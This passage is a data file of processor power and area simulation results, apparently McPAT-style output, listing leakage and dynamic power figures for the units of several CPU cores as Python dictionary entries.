'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0340427,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.16541,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0927748,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.115624,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.48901,
'Instruction Fetch Unit/Runtime Dynamic': 0.24962,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0347599,
'L2/Runtime Dynamic': 0.005254,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.46485,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.596012,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0397198,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0397199,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.65241,
'Load Store Unit/Runtime Dynamic': 0.831617,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0979424,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.195885,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0347601,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.035259,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.134637,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0152779,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.350458,
'Memory Management Unit/Runtime Dynamic': 0.0505369,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.5182,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.11274,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00652249,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0561316,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.175394,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.6672,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0129848,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.212888,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0756835,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.145113,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.234063,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.118147,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.497323,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.154364,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.25505,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0142982,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00608671,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0486495,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0450149,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0629478,
'Execution Unit/Register Files/Runtime Dynamic': 0.0511016,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.105738,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.273693,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.44038,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00167226,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00167226,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00150697,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00061096,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000646643,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00549813,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0142314,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.043274,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.7526,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.147256,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.146978,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.1047,
'Instruction Fetch Unit/Runtime Dynamic': 0.357238,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.03448,
'L2/Runtime Dynamic': 0.00717489,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.64138,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.685599,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0454312,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0454311,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.85592,
'Load Store Unit/Runtime Dynamic': 0.955081,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.112026,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.224051,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0397583,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0401783,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.171147,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0244302,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.395553,
'Memory Management Unit/Runtime Dynamic': 0.0646085,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.2352,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0376123,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00700485,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.073184,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.117801,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.94229,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.009838,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.210416,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0542996,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.133289,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.21499,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.10852,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.456799,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.144119,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.19982,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0102584,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00559074,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0440635,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0413469,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0543219,
'Execution Unit/Register Files/Runtime Dynamic': 0.0469377,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0952896,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.264781,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.38431,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00112819,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00112819,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00103266,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00042711,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000593952,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00388299,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00903028,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
